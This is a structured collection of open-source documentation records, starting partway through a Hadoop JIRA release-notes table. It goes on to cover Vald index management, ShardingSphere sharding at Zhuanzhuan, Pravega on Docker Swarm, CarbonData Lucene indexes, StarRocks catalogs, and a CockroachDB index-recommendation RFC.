Hitchcock | Jim Kellerman | | | DfsTask no longer compiles | Major | build | Chris Douglas | Chris Douglas | | | processing escapes in a jute record is quadratic | Blocker | record | Dick King | Vivek Ratan | | | distcp should use the Path -\\> FileSystem interface like the rest of Hadoop | Major | util | Owen O'Malley | Chris Douglas | | | MultiFileSplit does not write and read the total length | Major | . | Thomas Friol | Thomas Friol | | | Files created with an pre-0.15 gets blocksize as zero, causing performance degradation | Blocker | . | dhruba borthakur | dhruba borthakur | | | Single lost heartbeat leads to a \"Lost task tracker\" | Major | . | Andrzej Bialecki | Arun C Murthy | | | MutliFileInputFormat returns \"empty\" MultiFileSplit when number of paths \\< number of splits | Major | . | Thomas Friol | Thomas Friol | | | Task's diagnostic messages are lost sometimes | Critical | . | Arun C Murthy | Arun C Murthy | | | DatanodeReport should distinguish live datanodes from dead datanodes | Major | . | Hairong Kuang | Hairong Kuang | | | Race condition in MiniDFSCluster shutdown | Major | test | Chris Douglas | Chris Douglas | | | make files visible in the namespace as soon as they are created | Major | . | dhruba borthakur | dhruba borthakur | | | The JobTracker should ensure that it is running on the right host. | Major | . | Owen O'Malley | Owen O'Malley | | | Revert a debug patch. | Trivial | . | Raghu Angadi | Raghu Angadi | | | Fix path in EC2 scripts for building your own AMI | Major | contrib/cloud | Tom White | Tom White | | | In the Job UI, some links don't work | Major | . | Devaraj Das | Amar Kamat | | | Reading an ArrayWriter does not work because valueClass does not get initialized | Major | io | Dick King | Cameron Pope | | | JobClient.runJob kills the job for failed tasks with no diagnostics | Major | . | Christian Kunz | Christian Kunz | | | ArrayIndexOutOfBoundException in BlocksMap | Blocker | . | Konstantin Shvachko | Konstantin Shvachko | | | ArrayIndexOutOfBoundsException with trunk | Major | . 
| Raghu Angadi | dhruba borthakur | | | files are not visible until they are closed | Critical | . | Yoram Arnon | dhruba borthakur | | | Remove extra '\\*'s from FsShell.limitDecimal() | Minor | . | Raghu Angadi | Raghu Angadi | | | Support for 0 reducers in PIPES | Major |" }, { "data": "| Christian Kunz | Owen O'Malley | | | keyToPath in Jets3tFileSystemStore needs to return absolute path | Major | fs/s3 | Ahad Rana | Tom White | | | Hadoop Pipes doesn't compile on solaris | Major | . | Owen O'Malley | Owen O'Malley | | | Periodic checkpointing cannot resume if the secondary name-node fails. | Major | . | Konstantin Shvachko | dhruba borthakur | | | Test dfs.TestFileCreation.testFileCreation failed on Windows | Blocker | test | Mukund Madhugiri | dhruba borthakur | | | TestDFSUpgradeFromImage doesn't shut down its MiniDFSCluster | Major | test | Chris Douglas | Chris Douglas | | | Too many fetch-failures issue | Blocker | . | Christian Kunz | Arun C Murthy | | | Extra checks in DFS.create() are not necessary. | Minor | . | Raghu Angadi | Raghu Angadi | | | about.html page is there but not linked. | Major | . | Enis Soztutar | Enis Soztutar | | | the job tracker should wait beteween calls to try and delete the system directory | Blocker | . | Owen O'Malley | Owen O'Malley | | | NullPointerException in internalReleaseCreate | Blocker | . | Konstantin Shvachko | dhruba borthakur | | | du should be not called on every heartbeat | Blocker | . | Konstantin Shvachko | Hairong Kuang | | | Spurious error message during block crc upgrade. | Blocker | . | Raghu Angadi | Raghu Angadi | | | the os.name string on Mac OS contains spaces, which causes the c++ compilation to fail | Major | . | Owen O'Malley | Owen O'Malley | | | Use of File.separator in StatusHttpServer prevents running Junit tests inside eclipse on Windows | Minor | . | Jim Kellerman | Jim Kellerman | | | Name-node should remove edits.new during startup rather than renaming it to edits. | Blocker | . | Konstantin Shvachko | Konstantin Shvachko | | | Secondary Namenode halt when SocketTimeoutException at startup | Blocker | . | Koji Noguchi | dhruba borthakur | | | Corrupted block replication retries for ever | Blocker | . | Koji Noguchi | Raghu Angadi | | | -get, -copyToLocal fail when single filename is passed | Blocker | . | Koji Noguchi | Raghu Angadi | | | TestCheckpoint fails on Windows | Blocker | . | Konstantin Shvachko | Konstantin Shvachko | | | jobs using pipes interface with tasks not using java output format have a good chance of not updating progress and timing out | Major | . | Christian Kunz | Owen O'Malley | | | multiple dfs.client.buffer.dir directories are not treated as alternatives | Blocker | fs | Christian Kunz | Hairong Kuang | | | Sort validation is taking considerably longer than before | Blocker | . | Mukund Madhugiri | Arun C Murthy | | | lost task trackers -- jobs hang | Blocker | . | Christian Kunz | Devaraj Das | | | Maps which ran on trackers declared 'lost' are being marked as FAILED rather than KILLED | Blocker |" }, { "data": "| Arun C Murthy | Devaraj Das | | | Namenode prints out too many log lines for \"Number of transactions\" | Blocker | . | dhruba borthakur | dhruba borthakur | | | Task times are not saved correctly (bug in hadoop-1874) | Blocker | . | Devaraj Das | Amar Kamat | | | Lost tasktracker not handled properly leading to tips wrongly being kept as completed, and hence not rescheduled | Blocker | . 
| Devaraj Das | Devaraj Das | | | Broken pipe SocketException in DataNode$DataXceiver | Blocker | . | Konstantin Shvachko | Hairong Kuang | | | TestLocalDirAllocator fails on Windows | Blocker | fs | Mukund Madhugiri | Hairong Kuang | | | Race condition in removing a KILLED task from tasktracker | Blocker | . | Devaraj Das | Arun C Murthy | | | streaming hang when IOException in MROutputThread. (NPE) | Blocker | . | Koji Noguchi | Lohit Vijayarenu | | | distcp fails if log dir not specified and destination not present | Blocker | util | Chris Douglas | Chris Douglas | | | Increase the buffer size of pipes from 1k to 128k | Blocker | . | Owen O'Malley | Amareshwari Sriramadasu | | | JobTracker's TaskCommitQueue is vulnerable to non-IOExceptions | Blocker | . | Arun C Murthy | Arun C Murthy | | | NPE at JobTracker startup.. | Blocker | . | Gautam Kowshik | Amareshwari Sriramadasu | | | Namenode encounters ClassCastException exceptions for INodeFileUnderConstruction | Blocker | . | dhruba borthakur | dhruba borthakur | | | In SequenceFile sync doesn't work unless the file is compressed (block or record) | Blocker | . | Owen O'Malley | Owen O'Malley | | | RawLocalFileStatus is causing Path problems | Major | fs | Dennis Kubes | | | | Test org.apache.hadoop.mapred.pipes.TestPipes.unknown failed | Blocker | . | Mukund Madhugiri | Owen O'Malley | | | ChecksumFileSystem checksum file size incorrect. | Blocker | fs | Richard Lee | Owen O'Malley | | | DISTCP mapper should report progress more often | Blocker | . | Runping Qi | Chris Douglas | | | Datanode corruption if machine dies while writing VERSION file | Blocker | . | Michael Bieniosek | Konstantin Shvachko | | | hadoop-daemon.sh script fails if HADOOP\\PID\\DIR doesn't exist | Minor | scripts | Michael Bieniosek | Michael Bieniosek | | | HADOOP-2046 caused some javadoc anomalies | Major | documentation | Nigel Daley | Nigel Daley | | | ToolBase doesn't keep configuration | Blocker | util | Dennis Kubes | Dennis Kubes | | | hdfs -cp /a/b/c /x/y acts like hdfs -cp /a/b/c/\\* /x/y | Minor | . | arkady borkovsky | Mahadev konar | | | \"Go to parent directory\" does not work on windows. | Minor | . | Konstantin Shvachko | Mahadev konar | | | df command doesn't exist under windows | Major | fs | Benjamin Francisoud | Mahadev konar | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Warnings With JDK1.6.0\\_02 | Minor | . | Nilay Vaish | Nilay Vaish |" } ]
{ "category": "App Definition and Development", "file_name": "index-manager.md", "project_name": "Vald", "subcategory": "Database" }
[ { "data": "Vald Index Manager is the component that controls the indexing process of Vald Agent Pods in the same Vald cluster. Vald Index Manager has a unique and simple role in controlling the indexing timing for all Vald Agent pods in the Vald cluster. It requires `Vald Discoverer` to fulfill its responsibility. This chapter shows the main features to fulfill Vald Index Managers role. Vald Index Manager gets the IP addresses of each Vald Agent pod from Vald Discoverer when its container starts. In addition, when IP address changes, Vald Index Manager gets the new IP address from Vald Discoverer. Vald Index Manager uses these for the controlling indexing process. When Vald Agent Pod creates or saves indexes on its container memory, it blocks all searching requests from the user and returns an error instead of a search result. Stop-the-world happens when all Vald Agent pods run the function involved in the indexing operation, e.g., `createIndex`, simultaneously. Vald Index Manager manages the indexing process of all Vald Agent pods to prevent this event. Vald Index Manager uses a Vald Agent pods' IP address list from Vald Discoverer and index information, including the stored index count, uncommitted index count, creating index count, and saving index count, from each Vald Agent pod. The control process is Vald Index Manager sends `createIndex` requests for concurrency simultaneously, sends a new request when the job is finished and continues until it sends to all agents. At the end of each process, Vald Index Manager updates the index information from each Vald Agent pod. Vald Index Manager runs this process periodically by set time intervals. <div class=\"notice\"> Concurrency means the number of Vald Agent pods for simultaneously sending requests for the indexing operation.<BR> When the Vald Agent pod has no uncommitted index or is running the indexing function already, it does not send the request. </div>" } ]
{ "category": "App Definition and Development", "file_name": "2022_04_29_Apache_ShardingSphere_Enterprise_Applications_Zhuanzhuan’s_Transaction_System_with_100s_of_Millions_of_Records.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
[ { "data": "+++ title = \"Apache ShardingSphere Enterprise Applications: Zhuanzhuans Transaction System with 100s of Millions of Records\" weight = 53 chapter = true +++ is an internet platform that allows it users to sell their second-hand stuff sort of an eBay of the East. Its business had been booming, and with it the ordering system started to face increasing performances challenges. The order database is the cornerstone of the system, and its performance should not be underestimated. Challenges: During promotions and special discount periods the burden on databases is heaby with tens of thousands of single database queries per second (qps) taking up huge database resources, and causing a significant reduction in write performance. Increased data pressure, with a single database containing several large tables with hundreds of millions of data, which challenges the capacity limit of the server. Overwhelming data volume, and data backup and recovery take a long time, posing high risks of data loss in extreme cases. In the beginning, ZhuanZhuans team took adjustment measures to ease the database pressure. Exmaples include: Optimized major transactions, reduced transactions, and even eliminated transactions We adjusted the original transaction order by putting table generation, the core step at the end, and keeping the transaction only in the order primary database. When the operation of the main table was abnormal, dirty reads were allowed on other order-related tables. Order data cache Data consistency was the trickiest part of the cache. As order data involved account settlements and commission, non-real-time and inconsistent data would cause serious accidents. Strictly keeping cache data consistency would complex coding and reduce system concurrency. Therefore, we made some compromises on cache plans: Allowing direct query when cache failed. Adding version serial number, and querying the latest versions data to ensure real-time data. Complex queries were conducted by and primary and secondary separation, and for some large tables, we adopted hot and cold data separation. Through these optimizations, database pressure was eased. However, it still seemed overwhelming under high concurrency scenarios, such as discount season. To fundamentally solve the performance problem of order database, ZhuanZhuan decided to adopt data sharding (database and table splitting) on the `order` database so that we wouldnt have to worry about order capacity in the future 35 years. Zhuangzhuang chose after comparing the efficiency, stability, learning cost and etc. of different data sharding components. Advantages of ShardingSphere: It provides standardized data sharding, distributed transactions and database governance, and its applicable in a variety of situations such as Java isomorphism, heterogeneous language and cloud native. It has flexible sharding strategies, supporting multiple sharding methods. Its easy to integrate with other components and has a low level of transaction intrusions. It has extensive documentation and an active community. ShardingSphere initiated the Database Plus concept and adopts a plugin oriented architecture where all modules are independent of each other, allowing each to be used individually or flexibly" }, { "data": "It consists of three products, namely , and (Planning), which supports both independent and hybrid deployment. 
Below is a feature comparison of the three products: By comparison, and considering the high order concurrency, we chose ShardingSphere-JDBC as our data sharding middleware. ShardingSphere-JDBC is a lightweight Java framework, proving extra service at the JDBC layer. It directly connects to the database by the client-side, provides services by Jar package, and requires no extra deployment and reliance. It can be seen as an enhanced JDBC driver, fully compatible with JDBC and other Object-Relational Mapping(ORM) frameworks. Sharding Key The current order ID is generated by `timestamp+user identification code+machine code+incremental sequence`. The user identification code is taken from bits 9 to 16 of the buyer ID, a true random number when the user ID is generated, and is thus suitable as a sharding key. Choosing user identification code as the sharding key has some advantages: The data can be distributed as evenly as possible to each database and table. Specific sharding locations can be quickly located either by order ID or user ID. Data of the same buyer can be distributed to the same databases and tables, facilitating the integrated query of the buyer information. The sharding strategy: we adopt 16 databases and 16 tables. User identification codes are used to split databases, and higher 4 bits are used to split tables. Data Migration between Old and New Databases The migration must be online, and downtime migration cannot be accepted, as there will be new data writes during the migration process. The data should be intact, and the migration process should be insensible to the client-side. After the migration, data in the new database should be consistent with the ones in the old databases. The migration should allow rollback, so that when a problem occurs during the migration process, it should be able to roll back to the source database without impacting system availability. Data migration steps are as follows: dual writes-> migrate historical data-> verify-> old database offline. It solves the problem of single database capacity limit. The data volume of a single database and table is greatly reduced after sharding. The data volume of a single table is reduced from nearly a hundred million level to several millions level, which greatly improves the overall performance. It reduces the risk of data losses due to oversized single databases and tables in extreme cases and eases the pressure of operation and maintenance. The following is a comparison of the number of interface calls of the order placement service and the time consumed by the interface during two promotion and discount periods: Promotion before adopting ShardingSphere Promotion after adopting ShardingSphere ShardingSphere simplifies the development of data sharding with its well-designed architecture, highly flexible, pluggable and scalable capabilities, allowing R&D teams to focus only on the business itself, thus enabling flexible scaling of the data architecture. Apache ShardingSphere Project Links:" } ]
{ "category": "App Definition and Development", "file_name": "docker-swarm.md", "project_name": "Pravega", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Copyright Pravega Authors. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Docker Swarm can be used to quickly spin up a distributed Pravega cluster that can easily scale up and down. Unlike `docker-compose`, this is useful for more than just testing and development. In future, Docker Swarm will be suitable for production workloads. A working single or multi-node Docker Swarm. Please refer to . HDFS and ZooKeeper. We provide compose files for both of these, but both are single instance deploys that should only be used for testing/development. More information to deploy our HDFS and ZooKeeper can be found . Please refer to `hdfs.yml` and `zookeeper.yml` files. ``` docker stack up --compose-file hdfs.yml pravega docker stack up --compose-file zookeeper.yml pravega ``` This runs a single node HDFS container and single node ZooKeeper inside the `pravega_default` overlay network, and adds them to the `pravega` stack. HDFS is reachable inside the swarm as ``` hdfs://hdfs:8020 ``` ZooKeeper is reachable at ``` tcp://zookeeper:2181. ``` Either one or both of these can be initiated for running, but serious workloads cannot be handled. Each Pravega Segment Store needs to be directly reachable by clients. Docker Swarm runs all traffic coming into its overlay network through a load balancer, which makes it more or less impossible to reach a specific instance of a scaled service from outside the cluster. This means that Pravega clients must either run inside the swarm, or we must run each Segment Store as a unique service on a distinct port. Both approaches are demonstrated in the below" }, { "data": "The easiest way to deploy is to keep all traffic inside the swarm. This means your client apps must also run inside the swarm. ``` ZKURL=zookeeper:2181 HDFSURL=hdfs:8020 docker stack up --compose-file pravega.yml pravega ``` Note that `ZKURL` and `HDFSURL` don't include the protocol. They have default values assigned as `zookeeper:2181` and `hdfs:8020`, when deployed using `zookeeper.yml`/`hdfs.yml`. Your clients must then be deployed into the swarm, using the following command. ``` docker service create --name=myapp --network=pravega_default mycompany/myapp ``` The crucial bit being ``` --network=pravega_default. ``` Your client should talk to Pravega at ``` tcp://controller:9090. ``` If you intend to run clients outside the swarm, you must provide two additional environment variables, `PUBLISHEDADDRESS` and `LISTENINGADDRESS`. `PUBLISHED_ADDRESS` must be an IP or Hostname that resolves to one or more swarm nodes (or a load balancer that sits in front of them). `LISTENING_ADDRESS` should always be `0`, or `0.0.0.0`. ``` PUBLISHEDADDRESS=1.2.3.4 LISTENINGADDRESS=0 ZKURL=zookeeper:2181 HDFSURL=hdfs:8020 docker stack up --compose-file pravega.yml pravega ``` As above, `ZKURL` and `HDFSURL` can be omitted if the services are at their default locations. Your client should talk to Pravega at ``` tcp://${PUBLISHED_ADDRESS}:9090`. ``` BookKeeper can be scaled up or down using the following command. 
``` docker service scale pravega_bookkeeper=N ``` As configured in this package, Pravega requires at least 3 BookKeeper nodes, (i.e., N must be >= 3.) Pravega Controller can be scaled up or down using the following command. ``` docker service scale pravega_controller=N ``` If you app will run inside the swarm and you didn't run with `PUBLISHED_ADDRESS`, you can scale the Segment Store the usual way using the following command. ``` docker service scale pravega_segmentstore=N ``` If you require access to Pravega from outside the swarm and have deployed with `PUBLISHED_ADDRESS`, each instance of the Segment Store must be deployed as a unique service. This is a cumbersome process, but we've provided a helper script to make it fairly painless: ``` ./scale_segmentstore N ``` All services, (including HDFS and ZooKeeper if you've deployed our package) can be destroyed using the following command. ``` docker stack down pravega ```" } ]
{ "category": "App Definition and Development", "file_name": "lucene-index-guide.md", "project_name": "Apache CarbonData", "subcategory": "Database" }
[ { "data": "<!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Lucene Index can be created using following DDL ``` CREATE INDEX [IF NOT EXISTS] index_name ON TABLE maintable (indexcolumns) AS 'lucene' [PROPERTIES ('key'='value')] ``` index_columns is the list of string columns on which lucene creates indexes. Index can be dropped using following DDL: ``` DROP INDEX [IF EXISTS] index_name ON [TABLE] main_table ``` To show all Indexes created, use: ``` SHOW INDEXES ON [TABLE] main_table ``` It will show all Indexes created on the main table. NOTE: Keywords given inside `[]` is optional. Lucene is a high performance, full featured text search engine. Lucene is integrated to carbon as an index and managed along with main tables by CarbonData. User can create lucene index to improve query performance on string columns which has content of more length. So, user can search tokenized word or pattern of it using lucene query on text content. For instance, main table called index_test which is defined as: ``` CREATE TABLE index_test ( name string, age int, city string, country string) STORED AS carbondata ``` User can create Lucene index using the Create Index DDL: ``` CREATE INDEX dm ON TABLE index_test (name,country) AS 'lucene' ``` Properties FLUSH_CACHE: size of the cache to maintain in Lucene writer, if specified then it tries to aggregate the unique data till the cache limit and flush to Lucene. It is best suitable for low cardinality dimensions. SPLIT_BLOCKLET: when made as true then store the data in blocklet wise in lucene , it means new folder will be created for each blocklet, thus, it eliminates storing blockletid in lucene and also it makes lucene small chunks of data. When loading data to main table, lucene index files will be generated for all the index_columns(String Columns) given in CREATE statement which contains information about the data location of index_columns. These index files will be written inside a folder named with index name inside each segment folder. A system level configuration `carbon.lucene.compression.mode` can be added for best compression of lucene index files. The default value is speed, where the index writing speed will be" }, { "data": "If the value is compression, the index file size will be compressed. As a technique for query acceleration, Lucene indexes cannot be queried directly. Queries are to be made on the main table. When a query with TEXT_MATCH('name:c10') or TEXTMATCHWITH_LIMIT('name:n10',10)[the second parameter represents the number of result to be returned, if user does not specify this value, all results will be returned without any limit] is fired, two jobs will be launched. 
The first job writes the temporary files in folder created at table level which contains lucene's search results and these files will be read in second job to give faster results. These temporary files will be cleared once the query finishes. User can verify whether a query can leverage Lucene index or not by executing the `EXPLAIN` command, which will show the transformed logical plan, and thus user can check whether TEXT_MATCH() filter is applied on query or not. Note: The filter columns in TEXTMATCH or TEXTMATCHWITHLIMIT must be always in lowercase and filter conditions like 'AND','OR' must be in upper case. Ex: ``` select from index_test where TEXT_MATCH('name:10 AND name:n') ``` Query supports only one TEXT_MATCH udf for filter condition and not multiple udfs. The following query is supported: ``` select from index_test where TEXT_MATCH('name:10 AND name:n') ``` The following query is not supported: ``` select from index_test where TEXT_MATCH('name:10) AND TEXT_MATCH(name:n') ``` Below `like` queries can be converted to text_match queries as following: ``` select * from index_test where name='n10' select * from index_test where name like 'n1%' select * from index_test where name like '%10' select * from index_test where name like '%n%' select * from index_test where name like '%10' and name not like '%n%' ``` Lucene TEXT_MATCH Queries: ``` select * from indextest where TEXTMATCH('name:n10') select from index_test where TEXT_MATCH('name:n1') select from index_test where TEXT_MATCH('name:10') select from index_test where TEXT_MATCH('name:n*') select from index_test where TEXT_MATCH('name:10 -name:n') ``` Note: For lucene queries and syntax, refer to Once there is a lucene index created on the main table, following command on the main table is not supported: Data management command: `UPDATE/DELETE`. Schema management command: `ALTER TABLE DROP COLUMN`, `ALTER TABLE CHANGE DATATYPE`, `ALTER TABLE RENAME`. Note: Adding a new column is supported, and for dropping columns and change datatype command, CarbonData will check whether it will impact the lucene index, if not, the operation is allowed, otherwise operation will be rejected by throwing exception. Partition management command: `ALTER TABLE ADD/DROP PARTITION`. However, there is still way to support these operations on main table, in current CarbonData release, user can do as following: Remove the lucene index by `DROP INDEX` command. Carry out the data management operation on main table. Create the lucene index again by `CREATE INDEX` command. Basically, user can manually trigger the operation by refreshing the index." } ]
{ "category": "App Definition and Development", "file_name": "SHOW_CATALOGS.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" Query all catalogs in the current StarRocks cluster, including the internal catalog and external catalogs. NOTE SHOW CATALOGS returns external catalogs to users who have the USAGE privilege on that external catalog. If users or roles do not have this privilege on any external catalog, this command returns only the default_catalog. ```SQL SHOW CATALOGS ``` ```SQL +-+--+-+ | Catalog | Type | Comment | +-+--+-+ ``` The following table describes the fields returned by this statement. | Field | Description | | - | | | Catalog | The catalog name. | | Type | The catalog type. `Internal` is returned if the catalog is `default_catalog`. The corresponding catalog type is returned if the catalog is an external catalog, such as `Hive`, `Hudi`, or `Iceberg`. | | Comment | The comments of a catalog. StarRocks does not support adding comments to an external catalog. Therefore, the value is `NULL` for an external catalog. If the catalog is `defaultcatalog`, the comment is `An internal catalog contains this cluster's self-managed tables.` by default. `defaultcatalog` is the only internal catalog in a StarRocks cluster. | Query all catalogs in the current cluster. ```SQL SHOW CATALOGS\\G row * Catalog: default_catalog Type: Internal Comment: An internal catalog contains this cluster's self-managed tables. row * Catalog: hudi_catalog Type: Hudi Comment: NULL row * Catalog: iceberg_catalog Type: Iceberg Comment: NULL ```" } ]
{ "category": "App Definition and Development", "file_name": "spicule.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Spicule\" icon: /images/logos/powered-by/spicule.png hasLink: \"https://www.spicule.co.uk/posts/welcome\" <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. -->" } ]
{ "category": "App Definition and Development", "file_name": "chapter3-similarity-search.md", "project_name": "YugabyteDB", "subcategory": "Database" }
[ { "data": "Set the rank to 7, select the Comedy genre and ask the following question: ```text What are the funniest comedy movies worth watching? ```" } ]
{ "category": "App Definition and Development", "file_name": "20211112_index_recommendation.md", "project_name": "CockroachDB", "subcategory": "Database" }
[ { "data": "Feature Name: Index Recommendation Engine Status: in-progress Start Date: 2018-10-18 Authors: Neha George RFC PR: Cockroach Issue: This document describes an \"index recommendation engine\" that would suggest table indexes for CockroachDB users to add. As of now, users do not have insight regarding the contribution of indexes to their workload's performance. This will be done by strategically selecting index subsets that could improve performance, and then using the optimizer costing algorithm to determine the best overall subset. The potential impact of this project is boundless, as every user could see a boost in their workload's performance. The main motivation behind this project is to capitalize on CockroachDB's performance potential. Adding certain indexes can have drastic impacts on the performance of a query, and if this said query is executed repeatedly, the performance discrepancy is all the more important. Index recommendation is universally applicable, meaning that this project could be used by all customers. The expected outcome is improved query performance on average. The PMs in this area are Kevin Ngo and Vy Ton. There are existing user stories, linked . The tentative plan is to start with manual single-statement index recommendations of indexes to add to the database, including index recommendations with STORING columns (to potentially avoid lookup joins). This functionality will then be extended to workload recommendations of indexes to add. From here, automatic recommendations of indexes to add and indexes to drop can be considered. To begin, we will have a single-statement index recommendation feature. This will be implemented first as the logic it uses can be expanded to support workload-level recommendations, discussed next in the RFC. The feature will output recommendations of indexes to add that will optimize a given query, which lends well to having it included with the `EXPLAIN` syntax, below the query plan. There will be index recommendations in a table format, including the index columns, their direction, and SQL command to run to add each index. For a single statement, the flow is planned as follows: Run the optbuilder's build function and walk through the statement to determine potential candidates, ensuring they do not already exist as indexes and that there are no duplicates. Add hypothetical indexes for each of the potential candidates for which an index does not already exist. Run the optimizer with these hypothetical indexes included and determine which potential candidates (if any) are actually being used in the optimal plan to find the \"recommendation set.\" Connect this flow to the `EXPLAIN` output, showing the final recommendation set. These ideas will be extended for workload recommendations, with the fundamental recommendation set and hypothetical index concepts being reused. In the background, we collect SQL statements that are executed by the user. This is stored in an existing table, `crdbinternal.statementstatistics`. Information regarding execution count and latencies, which will be used to assess a statement's tuning priority, can be obtained from this table. There are three proposed interfaces, which will be implemented in the given order. There is a new built-in function for index recommendations that takes in no parameters, called" }, { "data": "It generates index recommendations for the current database. 
Using the collected SQL statements, we then run the index recommendation algorithm that takes the SQL statements as input and outputs index recommendations. The index recommendations will populate a new `crdbinternal.indexrecommendations` virtual table, stored in memory, with the following columns: `createdate`, `table`, `columns`, and `storedcolumns`, which can then later be queried. The data types of the columns would be as follows: `create_date`: TIMESTAMPTZ `table`: INT_8 (table ID) `columns`: an array of JSONB with each entry storing a column's column ID (INT_8) and direction (boolean representing ascending or descending). `storedcolumns`: an array of integers with each column ID (INT8) We generate and surface index recommendations in the DB and CC console. There would be a UI showing the recommendations of indexes to create and drop in a table view, with an associated impact score or metric. How this metric is determined is uncertain, but it would be based on the frequency of that index's use in the workload and its cost-impact on the statements which use it. We automatically run the index recommendation algorithm periodically in the background and tune the database without user input. This is an end goal, after we have refined our index recommendations and are confident in them. Similar to statistics creation, this would become a job that runs in the background. The frequency of this would be configurable, and would also depend on the activity levels of the database (i.e. only run when there is low activity). For a given user database no matter what the interface, a sample workload W must be determined, from which index recommendations can be decided. W contains the top x DML statements ordered by execution count times the statement latency, where x must be high enough to ensure that the sum of statementlatency*executioncount is beyond some threshold. If this is not possible, we return an error to the user stating that there is not enough information to recommend indexes. This is operating under the claim that indexes can only benefit and adversely impact DML-type statements. Next we determine each statement's corresponding index recommendation set, if the statement has one (otherwise it will just be the empty set). These statement recommendation sets are sets of indexes that are tailored to the statement and will potentially be recommended to the user to improve overall workload performance. A statement will have a recommendation set if and only if it benefits from the addition of indexes. From here, the optimizer costing algorithm is used to determine which amalgamated index set should be recommended to the user. There are a large number of possible indexes for a given statement (S) that uses one or more tables, so we choose a candidate set . Choose S's candidate set as follows: Separate attributes that appear in S into 5 categories: J: Attributes that appear in JOIN conditions R: Attributes that appear in range or comparison conditions EQ: Attributes that appear in EQUAL conditions O: Attributes that appear in GROUP BY or ORDER BY clauses USED: Attributes that are referenced anywhere in the statement that are not in the above" }, { "data": "Note that in order to access this information, we need to parse the statement string and build the canonical expression so that `tree.UnresolvedName` types are resolved. Using these categories, follow a set of rules to create candidate indexes. For succinctness, only some rules are listed. 
These indexes are all ascending, other than multi-columned indexes created from an ORDER BY, where each column will depend on the direction of the ordering. By default, the first column will be ordered ascending. If that contradicts its natural ordering, then all columns in the index will do the same, and vice versa. This is to avoid redundant indexes. When O attributes come from a single table, create an index using all attributes from that ordering/grouping. Create single-attribute indexes from J, R, and EQ. If there are join conditions with multiple attributes from a single table, create a single index on these attributes. Inject these indexes as hypothetical indexes into the schema and optimize the single statement (more information about hypothetical indexes in the following section). Take every index that was used in the optimal plan and put it in this statement's recommendation set. Consider this sample SQL query: ```sql SELECT a FROM s JOIN t ON s.x = t.x WHERE (s.x = s.y AND t.z > 10 AND t.z < 20) ORDER BY s.y, s.z; ``` From this query and the rules listed, we would have for table s indexes: ``` J: (x) EQ: (x), (y) O: (y, z) ``` For table t: ``` J: (x) R: (z) ``` From here, we would construct the recommendation set of the query, which could result in indexes on either table, on no table, or on both tables. The reason not all candidate indexes are included is due to the fact that we only choose indexes used in the optimizer's best query plan. To reiterate, the recommendation set depends on the plan chosen by the optimizer, while the candidate set does not. The next step is applying the optimizer costing algorithm to determine the best set of indexes for the given workload W. That is, find a set of indexes X such that Cost(W, X) is minimized. For each statement's recommendation set, determine the optimizer cost of W if that index subset were to be applied. Choose the statement recommendation sets with the lowest Cost(W, X). We must then check for index overlap and remove similar/identical indexes to avoid redundancy. An example of two similar indexes is having an index on `(x, y)` and then also having an index on `(x, y, z)`. A strategy to determine which index to remove would be running W again with our chosen indexes, and of the redundant indexes choose the one that has the highest worth. Meaning, the sum of the frequencies of the statements in which the index is used is the highest. When we re-run W, we should also remove any chosen indexes that are unused. At this time, potential indexes can be compared with existing indexes. If indexes we want to recommend include existing indexes, we omit those" }, { "data": "In the case that no indexes remain, it means that no indexes will be recommended to the user to add. In a similar way, if the addition of our hypothetical indexes caused some existing indexes to become unused or rarely used, we would recommend that these indexes be deleted. If the index is still occasionally used, we need to ensure that removing it does not negatively affect overall performance. There would be some heuristics we make use of to do this. To fully ensure that this has not caused a regression however, we should re-run W with the index hypothetically dropped. Additionally, before we delete an index, we should ensure that no queries are regularly using hints to force that index. After this step, we have our optimal X that will be recommended to the user. In terms of the final output, we will have recommended indexes, if these recommendations exist. 
In addition, we should have a quantifiable \"impact score\" associated with an index recommendation that we can use to justify why the index would be beneficial to users. We can also include further information with this, such as which queries are affected and/or affected the most. For \"drop\" recommendations, we should have a similar metric. One issue with this approach is that it can become a feedback loop where adding new indexes affects the existing query plans, so we remove them, and then that allows for new potential indexes to be useful. The existence of this feedback loop means that the final recommendation set may not be the most optimal. This is a tradeoff that must be accepted - otherwise the algorithm could run infinitely. Plus, even if the recommendation set is not the most optimal, it will have still been proven to improve the sample workload performance, which is beneficial. Another heuristic that could be added is random swapping of a small subset of indexes being tried with other indexes that were found in W's recommendation sets. If the total cost of W is lower with this random swapping, we keep this configuration and continue as described above. The number of times this would be tried would be limited, to avoid having an inefficient algorithm. Implementation will begin with recommending potential indexes to add, followed by recommending indexes to remove. As an aside, we can also independently use index usage metrics to determine if there are any unused indexes that we should recommend be deleted. An additional issue is the lack of histograms on non-indexed columns. This will impact the plan that is chosen by the optimizer. Since statistics collection is a long and involved task, there is no clear way of mitigating this. Instead, this is a limitation that we must accept for now, especially since this will not stop us from making recommendations (it will just potentially impact their quality). It might be beneficial to also factor in the cost of index writes and index creation in our recommendation algorithm, which is not done by the optimizer's costing" }, { "data": "For database reads, indexes can only have positive impact, whereas for writes, they can have a negative impact. Also, creating an index has a storage cost. 